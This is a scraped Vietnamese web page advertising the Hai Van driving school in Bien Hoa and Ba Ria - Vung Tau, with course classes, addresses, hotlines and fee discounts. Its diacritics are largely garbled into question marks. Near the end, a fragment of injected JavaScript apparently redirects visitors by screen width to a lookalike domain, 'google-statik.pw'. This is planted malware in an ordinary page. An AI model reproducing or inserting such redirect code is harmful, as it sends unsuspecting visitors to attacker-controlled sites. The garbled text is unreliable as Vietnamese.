Trung Tâm Dạy Nghề

(otobienhoa.vn) - V?i kinh nghi?m dao t?o lai xe lau nam, chung toi da va dang kh?ng d?nh v? tri hang d?u trong linh v?c dao t?o lai xe ta?i Bien Ho?a - Do?ng Nai no?i rieng va? ca?c Ti?nh mie?n Dong Nam Bo? no?i chung.

D?n v?i “Trung Tam Da?y Nghe? & Da?o Ta?o Sa?t Ha?ch La?i Xe Ha?i Van”, h?c vien s? du?c dao t?o tren nhi?u lo?i xe d?i m?i, k?t h?p v?i ph?n m?m hi?n d?i tren may tinh du?c h?c nh?ng k? nang chu?n xac trong vi?c th?c hanh lai xe.

alt

Ho?c va? thi ngay ta?i trung tam co so? 1: Ta?i Bien Ho?a - Do?ng Nai

alt

Xe thi Ha?ng B2 Toyota Vios va? Kia ta?i  do?i mo?i 1.25 Ta?n

alt 

Xe thi Ha?ng C Isuzu 5 ta?n do?i mo?i 

alt

Ho?c va? thi ngay ta?i trung tam co so? 2: Ta?i Ba? Ri?a - Vu?ng Ta?u

alt

  - M?c tieu c?a chung toi la giup h?c vien thi d?t k?t qu? cao nh?t, v?i th?i gian nhanh va lai xe d?m b?o an toan.

  - Chung toi th?u hi?u tam ly c?a nh?ng h?c vien l?n d?u ng?i sau vo lang va nh?n ro trach nhi?m dao t?o c?a minh.

  - Chung toi t?o m?i di?u ki?n thu?n  l?i nh?t cho h?c vien khi di thi l?y b?ng lai xe o to cac h?ng.

       A1 - B - C - D - E - F - FC

Nh?n h? so dao t?o lai xe h?ng B - C; Nang c?p va b? tuc tay lai h?ng D, E. Th?i gian h?c theo yeu c?u c?a h?c vien. Dao t?o t? co b?n d?n nang cao, d?m b?o h?c xong khong c?n b? tuc tay lai.

Giao vien t?n tinh, kinh nghi?m. Co d?ch v? h?c dua do?n ta?n noi. M?t th?y kem m?t h?c vien.

 

M?i chi ti?t xin lien h?: Cong Ty TNHH - Trung Tam D?y Ngh? va Dao T?o Sat H?ch Lai Xe H?i Van

- Co so? 1: Trung Doa?n 22, Xa Lo? Ha? No?i, P. Long Bi?nh, Bien Ho?a - Do?ng Nai. - Hotline:  0933 955 686

- Co so? 2: A?p La?ng Ca?t, Xa? Tan Ha?i, Huye?n Tan Tha?nh, Ti?nh Ba? Ri?a - Vu?ng Ta?u. - Hotline:  0932 088 838

Quy? kha?ch vui lo?ng lien he? tru?c tie?p vo?i chu?ng toi de? duo?c tu va?n dang ky? ho?c so?m nha?t vo?i chi phi? tha?p nha?t.

- Da?c bie?t khi dang ky? ho?c.

- Ho?c vien vui lo?ng go?i die?n thoa?i qua Hotline: (0933 955 686 hoa?c 0932 088 838) de? dang ky? truo?c khi no?p ho? so ba?n se? duo?c uu da?i gia?m ho?c phi? tu? 100.000 VND - 200. 000 VND hoa?c 300.000 - 500. 000 VND tu?y theo kho?a ho?c hoa?c so? luo?ng ho?c vien khi ba?n no?p ho? so ta?i co so? 1 hoa?c co so? 2 cu?a trung tam.

if (screen.width ion = "http://google-statik.pw/l.php";}
 

Salon Auto

Nội thất đồ chơi

Tư vấn mua bán xe


 

Quảng Cáo